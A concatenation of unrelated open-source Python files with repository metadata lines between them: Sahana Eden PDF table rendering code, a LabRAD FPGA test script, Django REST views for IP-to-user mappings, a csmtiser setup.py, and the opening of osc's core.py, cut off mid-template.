self.addPageTemplates(self.landscapePage)
else:
self.addPageTemplates(self.normalPage)
BaseDocTemplate.build(self, self.body_flowable, canvasmaker=canvasmaker)
# -------------------------------------------------------------------------
def add_page_decorators(self, canvas, doc):
"""
"""
if self.header_flowable:
top = self.bottomMargin + self.printable_height
for flow in self.header_flowable:
height = self.get_flowable_size(flow)[PDF_HEIGHT]
bottom = top - height
flow.drawOn(canvas,
self.leftMargin,
bottom
)
top = bottom
if self.footer_flowable:
top = self.bottomMargin + self.footer_height
for flow in self.footer_flowable:
height = self.get_flowable_size(flow)[PDF_HEIGHT]
bottom = top - height
flow.drawOn(canvas,
self.leftMargin,
bottom
)
top = bottom
# -------------------------------------------------------------------------
def addParagraph(self, text, style=None, append=True):
"""
Method to create a paragraph that may be inserted into the document
@param text: The text for the paragraph
@param append: If True then the paragraph will be stored in the
document flow ready for generating the pdf.
@return The paragraph
This method can return the paragraph rather than inserting into the
document. This is useful if the paragraph needs to be first
inserted in another flowable, before being added to the document.
An example of when this is useful is when large amounts of text
(such as a comment) are added to a cell of a table.
"""
if text != "":
if style == None:
styleSheet = getSampleStyleSheet()
style = styleSheet["Normal"]
para = Paragraph(text, style)
if append and self.body_flowable:
self.body_flowable.append(para)
return para
return ""
# -------------------------------------------------------------------------
def cellStyle(self, style, cell):
"""
Add special styles to the text in a cell
"""
if style == "*GREY":
return [("TEXTCOLOR", cell, cell, colors.lightgrey)]
elif style == "*RED":
return [("TEXTCOLOR", cell, cell, colors.red)]
return []
# -------------------------------------------------------------------------
def addCellStyling(self, table, style):
"""
Add special styles to the text in a table
"""
row = 0
for line in table:
col = 0
for cell in line:
try:
if cell.startswith("*"):
(instruction, sep, text) = cell.partition(" ")
style += self.cellStyle(instruction, (col, row))
table[row][col] = text
except:
pass
col += 1
row += 1
return (table, style)
# =============================================================================
class S3PDFTable(object):
"""
Class to build a table that can then be placed in a pdf document
The table will be formatted so that is fits on the page. This class
doesn't need to be called directly. Rather see S3PDF.addTable()
"""
def __init__(self,
document,
rfields,
raw_data,
groupby = None,
hide_comments = False,
autogrow = False,
body_height = 0,
):
"""
Method to create a table object
@param document: A S3PDF object
@param raw_data: A list of rows
@param rfields: A list of field selectors
@param groupby: A field name that is to be used as a sub-group
All the records that share the same pdf_groupby value
will be clustered together
@param hide_comments: Any comment field will be hidden
"""
if current.deployment_settings.get_paper_size() == "Letter":
self.paper_size = LETTER
else:
self.paper_size = A4
# Fonts
set_fonts(self)
self.pdf = document
# @todo: Change the code to use raw_data directly rather than this
# conversion to an ordered list of values
self.rfields = rfields
rdata = []
rappend = rdata.append
for row in raw_data:
data = []
dappend = data.append
for selector in rfields:
value = row[selector.colname]
# Try to convert Web2py elements to ReportLab equivalents
dvalue = None
while True:
if isinstance(value, (basestring, lazyT)):
dvalue = value
elif isinstance(value, IMG):
dvalue = S3html2pdf.parse_img(value, selector.field.uploadfolder)
if dvalue:
dvalue = dvalue[0]
elif isinstance(value, DIV):
if len(value.components) > 0:
value = value.components[0]
continue
else:
dvalue = s3_unicode(value)
else:
dvalue = s3_unicode(value)
break
dappend(dvalue)
rdata.append(data)
self.raw_data = rdata
self.labels = [selector.label for selector in self.rfields]
self.list_fields = [selector.fname for selector in self.rfields]
self.pdf_groupby = groupby
self.hideComments = hide_comments
self.autogrow = autogrow
self.body_height = body_height
self.data = []
self.subheadingList = []
self.subheadingLevel = {}
self.pages = []
self.colWidths = []
self.newColWidth = [] # @todo: remove this (but see presentation)
self.rowHeights = []
self.style = None
# Temp document to test the table size, default to A4 portrait
# @todo: use custom template
# @todo: set pagesize for pdf component not whole document
self.tempDoc = EdenDocTemplate()
#self.tempDoc.setPageTemplates(self.pdf.pageHeader,
# self.pdf.pageFooter)
#self.tempDoc.pagesize = portrait(self.paper_size)
# Set up style constants
self.headerColour = Color(0.73, 0.76, 1)
self.oddColour = Color(0.92, 0.92, 1)
self.evenColour = Color(0.83, 0.84, 1)
self.MIN_COMMENT_COL_WIDTH = 200
self.fontsize = 12
# -------------------------------------------------------------------------
def build(self):
"""
Method to build the table.
@return: A list of Table objects. Normally this will be a list with
just one table object, but if the table needs to be split
across columns then one object per page will be created.
"""
if self.pdf_groupby:
data = self.group_data()
data = [self.labels] + data
elif self.raw_data != None:
data = [self.labels] + self.raw_data
# Only build the table if we have some data
if not data or not (data[0]):
return None
endCol = len(self.labels) - 1
rowCnt = len(data)
self.style = self.tableStyle(0, rowCnt, endCol)
tempTable = Table(data,
repeatRows=1,
style=self.style,
hAlign="LEFT"
)
self.data = data
self.tempDoc.build(None, [tempTable], None)
self.newColWidth = [tempTable._colWidths]
self.rowHeights = [tempTable._rowHeights]
self.pages.append(data)
if not self.tweakDoc(tempTable):
# Need to split the table
self.pages = self.splitTable(tempTable)
return self.presentation()
# -------------------------------------------------------------------------
def group_data(self):
"""
"""
groups = self.pdf_groupby.split(",")
newData = []
data = self.raw_data
level = 0
list_fields = self.list_fields
for field in groups:
level += 1
field = field.strip()
# Find the location of field in list_fields
i = 0
rowlength = len(list_fields)
while i < rowlength:
if list_fields[i] == field:
break
i += 1
list_fields = list_fields[0:i] + list_fields[i + 1:]
labels = self.labels[0:i] + self.labels[i + 1:]
self.labels = labels
currentGroup = None
r = 0
for row in data:
if r + 1 in self.subheadingList:
newData.append(row)
r += 1
else:
try:
group = row[i]
if group != currentGroup:
line = [group]
newData.append(line)
r += 1
currentGroup = group
self.subheadingList.append(r)
self.subheadingLevel[r] = level
# All existing subheadings after this point need to
# be shuffled down one place.
for x in range (len(self.subheadingList)):
if self.subheadingList[x] > r:
posn = self.subheadingList[x]
self.subheadingList[x] = posn + 1
oldlevel = self.subheadingLevel[posn]
del self.subheadingLevel[posn]
self.subheadingLevel[posn + 1] = oldlevel
line = row[0:i] + row[i + 1:]
newData.append(line)
r += 1
except:
newData.append(row)
r += 1
data = newData
newData = []
self.list_fields = list_fields
return data
# -------------------------------------------------------------------------
def presentation(self):
"""
This will convert the S3PDFTABLE object to a format that can be
used to add to a S3PDF document object.
This is only used internally but could be used to generate a copy
of a previously generated table
"""
# Build the tables
content = []
currentPage = 0
totalPagesAcross = len(self.newColWidth)
if self.autogrow == "H" or self.autogrow == "B":
printable_width = self.pdf.printable_width
# Expand the columns to use all the available space
newColWidth = []
for cols in self.newColWidth:
col_width = 0
for col in cols:
col_width += col
if col_width < printable_width:
surplus = printable_width - col_width
proportion = surplus / col_width
newcols = []
for col in cols:
newcols.append(col + col * proportion)
newColWidth.append(newcols)
self.newColWidth = newColWidth
startRow = 0
for page in self.pages:
if page == []:
currentPage += 1
continue
colWidths = self.newColWidth[currentPage % totalPagesAcross]
if self.autogrow == "V" or self.autogrow == "B":
row_height = self.rowHeights[0][0]
rows = len(page)
if self.body_height > row_height * rows:
rowCnt = int(self.body_height / row_height)
extra_rows = rowCnt - rows
if extra_rows:
cells = len(colWidths)
row = [""] * cells
extra = [row] * extra_rows
page = page + extra
endCol = len(colWidths) - 1
rowCnt = len(page)
self.style = self.tableStyle(startRow, rowCnt, endCol)
(page, self.style) = self.pdf.addCellStyling(page, self.style)
p = Table(page, repeatRows=1,
style=self.style,
hAlign="LEFT",
colWidths=colWidths,
emptyTableAction="indicate"
)
content.append(p)
# Add a page break, except for the last page.
if currentPage + 1 < len(self.pages):
content.append(PageBreak())
currentPage += 1
if currentPage % totalPagesAcross == 0:
startRow += rowCnt - 1 # Don't include the heading
return content
# -------------------------------------------------------------------------
def getAvailableMarginSpace(self):
"""
Internally used method to calculate the amount of space available
on the width of a page.
"""
_pdf = self.pdf
availableMarginSpace = _pdf.leftMargin \
+ _pdf.rightMargin \
- 2 * _pdf.MINIMUM_MARGIN_SIZE
return availableMarginSpace
# -------------------------------------------------------------------------
def tweakMargin(self, tableWidth):
"""
Internally used method to adjust the document margins so that the
table will fit into the available space
"""
availableMarginSpace = self.getAvailableMarginSpace()
currentOverlap = tableWidth - self.tempDoc.printable_width
endCol = len(self.labels) - 1
rowCnt = len(self.data)
# Check margins
if currentOverlap < availableMarginSpace:
_pdf = self.pdf
_pdf.leftMargin -= currentOverlap / 2
_pdf.rightMargin -= currentOverlap / 2
return True
return False
# -------------------------------------------------------------------------
def tweakFont(self, tableWidth, newFontSize, colWidths):
"""
Internally used method to adjust the font size used so that the
table will fit into the available space on the page.
"""
# Check font
adjustedWidth = tableWidth * newFontSize / self.fontsize
if (adjustedWidth - self.tempDoc.printable_width) < self.getAvailableMarginSpace():
for i in range(len(colWidths)):
colWidths[i] *= float(newFontSize) / float(self.fontsize)
self.newColWidth = [colWidths]
self.fontsize = newFontSize
return self.tweakMargin(adjustedWidth)
return False
# -------------------------------------------------------------------------
def minorTweaks(self, tableWidth, colWidths):
"""
Internally used method to tweak the formatting so that the table
will fit into the available space on the page.
"""
if self.tweakMargin(tableWidth):
return True
originalFont = self.fontsize
if self.tweakFont(tableWidth, originalFont -1, colWidths):
return True
if self.tweakFont(tableWidth, originalFont -2, colWidths):
return True
if self.tweakFont(tableWidth, originalFont -3, colWidths):
return True
return False
# -------------------------------------------------------------------------
def tweakDoc(self, table):
"""
Internally used method to adjust the table so that it will fit
into the available space on the page.
@return: True if it is able to perform minor adjustments and have
the table fit in the page. False means that the table will need to
be split across the columns.
"""
tableWidth = 0
for colWidth in table._colWidths:
tableWidth += colWidth
colWidths = table._colWidths
#print "Doc size %s x %s Table width %s" % (self.tempDoc.printable_width, self.tempDoc.height, total)
if tableWidth > self.tempDoc.printable_width:
# self.pdf.setMargins(0.5*inch, 0.5*inch)
# First massage any comment column by putting it in a paragraph
colNo = 0
for label in self.labels:
# Wrap comments in a paragraph
if label.lower() == "comments":
currentWidth = table._colWidths[colNo]
# print "%s %s" % (colNo, currentWidth)
if currentWidth > self.MIN_COMMENT_COL_WIDTH:
for i in range(1, len(self.data)): # skip the heading
try:
comments = self.data[i][colNo]
if comments:
comments = self.pdf.addParagraph(comments, append=False)
self.data[i][colNo] = comments
except IndexError:
pass
colWidths[colNo] = self.MIN_COMMENT_COL_WIDTH
tableWidth += self.MIN_COMMENT_COL_WIDTH - currentWidth
colNo += 1
if not self.minorTweaks(tableWidth, colWidths):
self.tempDoc.defaultPage = "Landscape"
self.tempDoc._calc()
self.pdf.defaultPage = "Landscape"
self.pdf._calc()
return self.minorTweaks(tableWidth, colWidths)
return True
# -------------------------------------------------------------------------
def splitTable(self, tempTable):
"""
Internally used method to split the table across columns so that it
will fit into the available space on the page.
"""
colWidths = tempTable._colWidths
rowHeights = tempTable._rowHeights
total = 0
colNo = 0
colSplit = []
newColWidth = []
pageColWidth = []
for colW in colWidths:
if colNo > 0 and total + colW > self.tempDoc.printable_width:
# Split before this column...
colSplit.append(colNo)
newColWidth.append(pageColWidth)
# ...and put it on a new page
pageColWidth = [colW]
total = colW
else:
# Append this column to the current page
pageColWidth.append(colW)
total += colW
colNo += 1
colSplit.append(len(colWidths))
newColWidth.append(pageColWidth)
self.newColWidth = newColWidth
total = 0
rowNo = 0
lastKnownHeight = 20 # Not all row heights get calculated.
rowSplit = []
for rowH in rowHeights:
if rowH == None:
rowH = lastKnownHeight
else:
lastKnownHeight = rowH
if total + rowH > self.body_height:
rowSplit.append(rowNo)
total = 2 * rowH # 2* is needed to take into account the repeated header row
else:
total += rowH
rowNo += 1
rowSplit.append(rowNo)
# Build the pages of data
pages = []
startRow = 1 # Skip the first row (the heading) because we'll generate our own
for endRow in rowSplit:
startCol = 0
for endCol in colSplit:
page = []
pappend = page.append
label = []
lappend = label.append
for colIndex in range(startCol, endCol):
try:
lappend(self.labels[colIndex])
except IndexError:
lappend("")
pappend(label)
for rowIndex in range(startRow, endRow):
line = []
lappend = line.append
for colIndex in range(startCol, endCol):
try:
lappend(self.data[rowIndex][colIndex])
except IndexError: # No data to add.
# If this is the first column of a subheading row then repeat the subheading
if len(line) == 0 and rowIndex in self.subheadingList:
try:
lappend(self.data[rowIndex][0])
except IndexError:
lappend("")
else:
lappend("")
pappend(line)
pages.append(page)
startCol = endCol
startRow = endRow
return pages
# -------------------------------------------------------------------------
def tableStyle(self, startRow, rowCnt, endCol, colour_required=False):
"""
Internally used method to assign a style to the table
@param startRow: The row from the data that the first data row in
the table refers to. When a table is split the first row in the
table (ignoring the label header row) will not always be the first row
in the data. This is needed to align the two. Currently this parameter
is used to identify sub headings and give them an emphasised styling
@param rowCnt: The number of rows in the table
@param endCol: The last column in the table
@todo: replace endCol with -1
(should work but need to test with a split table)
"""
font_name_bold = self.font_name_bold
style = [("FONTNAME", (0, 0), (-1, -1), self.font_name),
("FONTSIZE", (0, 0), (-1, -1), self.fontsize),
("VALIGN", (0, 0), (-1, -1), "TOP"),
("LINEBELOW", (0, 0), (endCol, 0), 1, Color(0, 0, 0)),
("FONTNAME", (0, 0), (endCol, 0), font_name_bold),
]
sappend = style.append
if colour_required:
sappend(("BACKGROUND", (0, 0), (endCol, 0), self.headerColour))
else:
sappend(("BACKGROUND", (0, 0), (-1, 0), colors.lightgrey))
sappend(("INNERGRID", (0, 0), (-1, -1), 0.2, colors.lightgrey))
if self.pdf_groupby != None:
sappend(("LEFTPADDING", (0, 0), (-1, -1), 20))
rowColourCnt = 0 # used to alternate the colours correctly when we have subheadings
for i in range(rowCnt):
# If subheading
if startRow + i in self.subheadingList:
level = self.subheadingLevel[startRow + i]
if colour_required:
sappend(("BACKGROUND", (0, i), (endCol, i),
self.headerColour))
sappend(("FONTNAME", (0, i), (endCol, i), font_name_bold))
sappend(("SPAN", (0, i), (endCol, i)))
sappend(("LEFTPADDING", (0, i), (endCol, i), 6 * level))
elif i > 0:
if colour_required:
if rowColourCnt % 2 == 0:
sappend(("BACKGROUND", (0, i), (endCol, i),
self.evenColour))
rowColourCnt += 1
else:
sappend(("BACKGROUND", (0, i), (endCol, i),
self.oddColour))
rowColourCnt += 1
sappend(("BOX", (0, 0), (-1, -1), 1, Color(0, 0, 0)))
return style
# =============================================================================
class S3html2pdf():
"""
Class that takes HTML in the form of web2py helper objects
and converts it to PDF
"""
def __init__(self,
pageWidth,
exclude_class_list = []):
"""
@param pageWidth:
@param exclude_class_list:
"""
# Fonts
set_fonts(self)
self.exclude_class_list = exclude_class_list
self.pageWidth = pageWidth
self.fontsize = 10
styleSheet = getSampleStyleSheet()
self.plainstyle = styleSheet["Normal"]
self.plainstyle.fontName = self.font_name
self.plainstyle.fontSize = 9
self.boldstyle = deepcopy(styleSheet["Normal"])
self.boldstyle.fontName = self.font_name_bold
self.boldstyle.fontSize = 10
self.titlestyle = deepcopy(styleSheet["Normal"])
self.titlestyle.fontName = self.font_name_bold
self.titlestyle.fontSize = 16
self.normalstyle = self.plainstyle
# To add more PDF styles define the style above (just like the titlestyle)
# Then add the style and the name to the lookup dict below
# These can then be added to the html in the code as follows:
# TD("Waybill", _class="pdf_title")
self.style_lookup = {"pdf_title": self.titlestyle}
# -------------------------------------------------------------------------
def parse(self, html):
"""
Entry point for class
"""
result = self.select_tag(html)
return result
# -------------------------------------------------------------------------
def select_tag(self, html, title=False):
"""
"""
if self.exclude_tag(html):
return None
if isinstance(html, TABLE):
return self.parse_table(html)
elif isinstance(html, A):
return self.parse_a(html)
elif isinstance(html, P):
return self.parse_p(html)
elif isinstance(html, IMG):
return S3html2pdf.parse_img(html)
elif isinstance(html, DIV):
return self.parse_div(html)
elif (isinstance(html, basestring) or isinstance(html, lazyT)):
if title:
para = [Paragraph(s3_unicode(html), self.boldstyle)]
else:
para = [Paragraph(s3_unicode(html), self.normalstyle)]
self.normalstyle = self.plainstyle
return para
return None
# -------------------------------------------------------------------------
def exclude_tag(self, html):
"""
"""
try:
if html.attributes["_class"] in self.exclude_class_list:
return True
if html.attributes["_class"] in self.style_lookup:
self.normalstyle = self.style_lookup[html.attributes["_class"]]
except:
pass
return False
# -------------------------------------------------------------------------
def parse_div(self, html):
"""
Parses a DIV element and converts it into a format for ReportLab
@param html: the DIV element to convert
@return: a list containing text that ReportLab can use
"""
content = []
select_tag = self.select_tag
for component in html.components:
result = select_tag(component)
if result != None:
content += result
if content == []:
return None
return content
# -------------------------------------------------------------------------
def parse_a(self, html):
"""
Parses an A element and converts it into a format for ReportLab
@param html: the A element to convert
@return: a list containing text that ReportLab can use
"""
content = []
select_tag = self.select_tag
for component in html.components:
result = select_tag(component)
if result != None:
content += result
if content == []:
return None
return content
# -------------------------------------------------------------------------
@staticmethod
def parse_img(html, uploadfolder=None):
"""
Parses an IMG element and converts it into an Image for ReportLab
@param html: the IMG element to convert
@param uploadfolder: an optional uploadfolder in which to find the file
@return: a list containing an Image that ReportLab can use
@note: The `src` attribute of the image must either
point to a static resource, directly to a file, or to an upload.
"""
from reportlab.platypus import Image
I = None
sep = os.path.sep
if "_src" in html.attributes:
src = html.attributes["_src"]
root_dir = "%s%s%s" % (sep, current.request.application, sep)
if uploadfolder:
src = src.rsplit("/", 1) # Don't use os.sep here
src = os.path.join(uploadfolder, src[1])
elif src.startswith("%sstatic" % root_dir):
src = src.split(root_dir)[-1]
src = os.path.join(current.request.folder, src)
else:
src = src.rsplit("/", 1) # Don't use os.sep here
src = os.path.join(current.request.folder,
"uploads%s" % sep, src[1])
if os.path.exists(src):
I = Image(src)
if not I:
return None
iwidth = I.drawWidth
iheight = I.drawHeight
# @todo: extract the number from a 60px value
# if "_height" in html.attributes:
# height = int(html.attributes["_height"]) * inch / 80.0
# width = iwidth * (height / iheight)
# elif "_width" in html.attributes:
# width = int(html.attributes["_width"]) * inch / 80.0
# height = iheight * (width / iwidth)
# else:
# height = 1.0 * inch
# width = iwidth * (height / iheight)
height = 1.0 * inch
width = iwidth * (height / iheight)
I.drawHeight = height
I.drawWidth = width
return [I]
# -------------------------------------------------------------------------
def parse_p(self, html):
"""
Parses a P element and converts it into a format for ReportLab
@param html: the P element to convert
@return: a list containing text that ReportLab can use
"""
content = []
select_tag = self.select_tag
for component in html.components:
result = select_tag(component)
if result != None:
content += result
if content == []:
return None
return content
# -------------------------------------------------------------------------
def parse_table(self, html):
"""
Parses a TABLE element and converts it into a format for ReportLab
@param html: the TABLE element to convert
@return: a list containing text that ReportLab can use
"""
style = [("FONTSIZE", (0, 0), (-1, -1), self.fontsize),
("VALIGN", (0, 0), (-1, -1), "TOP"),
("FONTNAME", (0, 0), (-1, -1), self.font_name),
("GRID", (0, 0), (-1, -1), 0.5, colors.grey),
]
content = []
cappend = content.append
rowCnt = 0
result = None
exclude_tag = self.exclude_tag
parse_tr = self.parse_tr
for component in html.components:
if exclude_tag(component):
continue
if isinstance(component, TR):
result = parse_tr(component, style, rowCnt)
rowCnt += 1
if result != None:
cappend(result)
if content == []:
return None
table = Table(content,
style=style,
hAlign="LEFT",
vAlign="Top",
)
cw = table._colWidths
return [table]
# -------------------------------------------------------------------------
def parse_tr (self, html, style, rowCnt):
"""
Parses a TR element and converts it into a format for ReportLab
@param html: the TR element to convert
@return: a list containing text that ReportLab can use
"""
row = []
rappend = row.append
sappend = style.append
colCnt = 0
exclude_tag = self.exclude_tag
select_tag = self.select_tag
font_name_bold = self.font_name_bold
for component in html.components:
if isinstance(component, (TH, TD)):
if exclude_tag(component):
continue
colspan = component.attributes.get("_colspan", 1)
if component.components == []:
rappend("")
else:
for detail in component.components:
result = select_tag(detail, title=isinstance(component, TH))
if result != None:
rappend(result)
if isinstance(component, TH):
sappend(("BACKGROUND", (colCnt, rowCnt), (colCnt, rowCnt), colors.lightgrey))
sappend(("FONTNAME", (colCnt, rowCnt), (colCnt, rowCnt), font_name_bold))
if colspan > 1:
for i in xrange(1, colspan):
rappend("")
sappend(("SPAN", (colCnt, rowCnt), (colCnt + colspan - 1, rowCnt)))
colCnt += colspan
else:
colCnt += 1
if row == []:
return None
return row
# END =========================================================================
| mit | -3,412,044,667,830,531,600 | 38.348821 | 123 | 0.482649 | false |
McDermott-Group/LabRAD | LabRAD/TestScripts/fpgaTest/conf.py | 1 | 1676 | import os
if __file__ in [f for f in os.listdir('.') if os.path.isfile(f)]:
# This is executed when the script is loaded by the labradnode.
SCRIPT_PATH = os.path.dirname(os.getcwd())
else:
# This is executed if the script is started by clicking or
# from a command line.
SCRIPT_PATH = os.path.dirname(__file__)
LABRAD_PATH = os.path.join(SCRIPT_PATH.rsplit('LabRAD', 1)[0])
import sys
if LABRAD_PATH not in sys.path:
sys.path.append(LABRAD_PATH)
import labrad
from LabRAD.TestScripts.fpgaTest.pyle.pyle.workflow import switchSession as pss #(P)yle(S)witch(S)ession
from LabRAD.TestScripts.fpgaTest.pyle.pyle.util import sweeptools as st
import fpgaTest
def switchSession(session=None, user=None):
"""Switch the current session, using the global connection object."""
global s
if user is None:
user = s._dir[1]
s = pss(cxn, user, session, useDataVault=False)
# connect to labrad and setup a wrapper for the current sample
cxn = labrad.connect()
switchSession(user='TestUser')
fpga = cxn.ghz_fpgas
# print(str(fpgaTest.daisyCheck(s, cxn, 10, 10, True)))
#fpgaTest.dacSignal(s, fpga)
#fpgaTest.runAverage(s, fpga, plot=True)
fpgaTest.average(s, cxn, 60, plot=True, save=False)
#fpgaTest.sumCheck(s, cxn, plot=True, save=False)
#fpgaTest.spectrum(s, cxn, plot=True, save=False)
#fpgaTest.sideband(s, cxn, plot=True, save=False)
# fpgaTest.filterCompare(s, cxn, [('square', 0), ('hann', 0),
# ('gaussian', 10)], plot=True, save=False)
#fpgaTest.phase(s, cxn, 'DAC', dacAmp=0.25, plot=True, save=False)
#fpgaTest.dacAmpToAdcAverage(s, cxn, plot=True, save=False)
#fpgaTest.adcAmpToVoltage(s, cxn, plot=True, save=False) | gpl-2.0 | -6,430,066,248,594,097,000 | 37.113636 | 104 | 0.711217 | false |
PGower/PNS | pns_web/endpoint/views.py | 1 | 4796 | from endpoint.models import Mapping, Fullname
from django.shortcuts import render, get_object_or_404
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.exceptions import APIException
from rest_framework import viewsets
from endpoint.serializers import MappingSerializer, FullnameSerializer
from haystack.query import SearchQuerySet
import logging
logger = logging.getLogger(__name__)
# API Views
class MappingAction(APIView):
'''
Generic API endpoint for the login/update/logout actions.
'''
def post(self, request, format=None):
try:
action = request.data.get('action')
username = request.data.get('username')
except KeyError as e:
raise APIException('An action and username are required')
# Update the Fullname mapping
Fullname.objects.update_or_create(username=username, defaults={
'username': username,
'fullname': request.data.get('fullname', '')
})
logger.debug(request.data.get('fullname'))
# Expire any existing records for this user
Mapping.objects.filter(username=username).filter(expired=False).update(expired=True)
new_mapping_serializer = MappingSerializer(data=request.data)
if new_mapping_serializer.is_valid():
if action == 'logout':
r = new_mapping_serializer.save(expired=True)
else:
new_mapping_serializer.save()
return Response('success')
else:
return Response(new_mapping_serializer.errors)
class InfoForGeneric(APIView):
'''Base class for the following 2'''
def query(self, term, expired):
raise NotImplemented
def get(self, request):
errors = []
response = {}
term = request.query_params.get('term')
try:
current = self.query(term, False).get()
except Mapping.MultipleObjectsReturned:
current = self.query(term, False).order_by('-created')[0]
errors.append('More then one address mapping was returned as the current mapping. The latest one is being used.')
except Mapping.DoesNotExist:
current = None
errors.append('There is currently no active mapping for {}.'.format(term))
finally:
if current is not None:
serialized_current = MappingSerializer(current)
response['current'] = serialized_current.data
else:
response['current'] = None
history = self.query(term, True).order_by('-created')
if len(history) > 0:
serialized_history = MappingSerializer(history, many=True)
response['history'] = serialized_history.data
else:
errors.append('There does not appear to be any history for {}'.format(term))
response['history'] = None
response['errors'] = errors
return Response(response)
class InfoForUser(InfoForGeneric):
'''
Return information about the username.
'''
def query(self, term, expired):
return Mapping.objects.filter(username=term).filter(expired=expired)
class InfoForAddress(InfoForGeneric):
'''
Return information about an IP address.
'''
def query(self, term, expired):
return Mapping.objects.filter(ip_address=term).filter(expired=expired)
class NameSearch(APIView):
'''
Given part of a name perform a full text search and find the username
'''
def get(self, request):
# import pdb;pdb.set_trace()
q = request.query_params.get('q')
if q == '!!preload':
results = Fullname.objects.all()
results = FullnameSerializer(results, many=True)
return Response({'results': results.data})
else:
query = SearchQuerySet().autocomplete(text=q)
results = query.load_all()
results = FullnameSerializer(results, many=True)
return Response({'results': results.data})
class RealtimeUpdates(APIView):
'''
Return all new mappings since the last call
'''
def get(self, request, last_id=None):
if last_id is None:
results = Mapping.objects.order_by('-created')[:20]
else:
results = Mapping.objects.filter(pk__gt=last_id)
if results.count() > 0:
last_id = results[0].pk
results = MappingSerializer(results, many=True)
response = {'results': results.data, 'last_id': last_id}
return Response(response)
# Actual Pages
def dashboard_page(request):
return render(request, 'index.html.j2', {})
| gpl-2.0 | 6,975,290,168,174,774,000 | 34.007299 | 125 | 0.617389 | false |
clarinsi/csmtiser | setup.py | 1 | 1140 | import os
from setuptools import setup
with open(os.path.join(os.path.dirname(__file__), 'README.md')) as readme:
README = readme.read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name='csmtiser',
version='0.0.1',
packages=['csmtiser'],
include_package_data=True,
license='MIT License',
description='A tool for text normalisation via character-level machine translation',
long_description=README,
url='https://github.com/clarinsi/csmtiser',
author='Matic Perovsek',
author_email='[email protected]',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'Topic :: Software Development :: Libraries'
],
install_requires=[
]
)
| lgpl-3.0 | 3,668,026,125,777,071,600 | 32.529412 | 88 | 0.642982 | false |
DimStar77/osc | osc/core.py | 1 | 290542 | # Copyright (C) 2006 Novell Inc. All rights reserved.
# This program is free software; it may be used, copied, modified
# and distributed under the terms of the GNU General Public Licence,
# either version 2, or version 3 (at your option).
from __future__ import print_function
__version__ = '0.159git'
# __store_version__ is to be incremented when the format of the working copy
# "store" changes in an incompatible way. Please add any needed migration
# functionality to check_store_version().
__store_version__ = '1.0'
import locale
import os
import os.path
import sys
import shutil
import subprocess
import re
import socket
import errno
import shlex
try:
from urllib.parse import urlsplit, urlunsplit, urlparse, quote_plus, urlencode, unquote
from urllib.error import HTTPError
from urllib.request import pathname2url, install_opener, urlopen
from urllib.request import Request as URLRequest
from io import StringIO
except ImportError:
#python 2.x
from urlparse import urlsplit, urlunsplit, urlparse
from urllib import pathname2url, quote_plus, urlencode, unquote
from urllib2 import HTTPError, install_opener, urlopen
from urllib2 import Request as URLRequest
from cStringIO import StringIO
try:
from xml.etree import cElementTree as ET
except ImportError:
import cElementTree as ET
from . import oscerr
from . import conf
try:
# python 2.6 and python 2.7
unicode
ET_ENCODING = "utf-8"
# python 2.6 does not have bytes and python 2.7 reimplements it as alias to
# str, but in incompatible way as it does not accept the same arguments
bytes = lambda x, *args: x
except:
#python3 does not have unicode, so lets reimplement it
#as void function as it already gets unicode strings
unicode = lambda x, *args: x
ET_ENCODING = "unicode"
DISTURL_RE = re.compile(r"^(?P<bs>.*)://(?P<apiurl>.*?)/(?P<project>.*?)/(?P<repository>.*?)/(?P<revision>.*)-(?P<source>.*)$")
BUILDLOGURL_RE = re.compile(r"^(?P<apiurl>https?://.*?)/build/(?P<project>.*?)/(?P<repository>.*?)/(?P<arch>.*?)/(?P<package>.*?)/_log$")
BUFSIZE = 1024*1024
store = '.osc'
new_project_templ = """\
<project name="%(name)s">
<title></title> <!-- Short title of NewProject -->
<description></description>
<!-- This is for a longer description of the purpose of the project -->
<person role="maintainer" userid="%(user)s" />
<person role="bugowner" userid="%(user)s" />
<!-- remove this block to publish your packages on the mirrors -->
<publish>
<disable />
</publish>
<build>
<enable />
</build>
<debuginfo>
<enable />
</debuginfo>
<!-- remove this comment to enable one or more build targets
<repository name="openSUSE_Factory">
<path project="openSUSE:Factory" repository="snapshot" />
<arch>x86_64</arch>
<arch>i586</arch>
</repository>
<repository name="openSUSE_13.2">
<path project="openSUSE:13.2" repository="standard"/>
<arch>x86_64</arch>
<arch>i586</arch>
</repository>
<repository name="openSUSE_13.1">
<path project="openSUSE:13.1" repository="standard"/>
<arch>x86_64</arch>
<arch>i586</arch>
</repository>
<repository name="Fedora_21">
<path project="Fedora:21" repository="standard" />
<arch>x86_64</arch>
<arch>i586</arch>
</repository>
<repository name="SLE_12">
<path project="SUSE:SLE-12:GA" repository="standard" />
<arch>x86_64</arch>
<arch>i586</arch>
</repository>
-->
</project>
"""
new_package_templ = """\
<package name="%(name)s">
<title></title> <!-- Title of package -->
<description></description> <!-- for long description -->
<!-- following roles are inherited from the parent project
<person role="maintainer" userid="%(user)s"/>
<person role="bugowner" userid="%(user)s"/>
-->
<!--
<url>PUT_UPSTREAM_URL_HERE</url>
-->
<!--
use one of the examples below to disable building of this package
on a certain architecture, in a certain repository,
or a combination thereof:
<disable arch="x86_64"/>
<disable repository="SUSE_SLE-10"/>
<disable repository="SUSE_SLE-10" arch="x86_64"/>
Possible sections where you can use the tags above:
<build>
</build>
<debuginfo>
</debuginfo>
<publish>
</publish>
<useforbuild>
</useforbuild>
Please have a look at:
http://en.opensuse.org/Restricted_formats
Packages containing formats listed there are NOT allowed to
be packaged in the openSUSE Buildservice and will be deleted!
-->
</package>
"""
new_attribute_templ = """\
<attributes>
<attribute namespace="" name="">
<value><value>
</attribute>
</attributes>
"""
new_user_template = """\
<person>
<login>%(user)s</login>
<email>PUT_EMAIL_ADDRESS_HERE</email>
<realname>PUT_REAL_NAME_HERE</realname>
<watchlist>
<project name="home:%(user)s"/>
</watchlist>
</person>
"""
new_group_template = """\
<group>
<title>%(group)s</title>
<person>
<person userid=""/>
</person>
</group>
"""
info_templ = """\
Project name: %s
Package name: %s
Path: %s
API URL: %s
Source URL: %s
srcmd5: %s
Revision: %s
Link info: %s
"""
new_pattern_template = """\
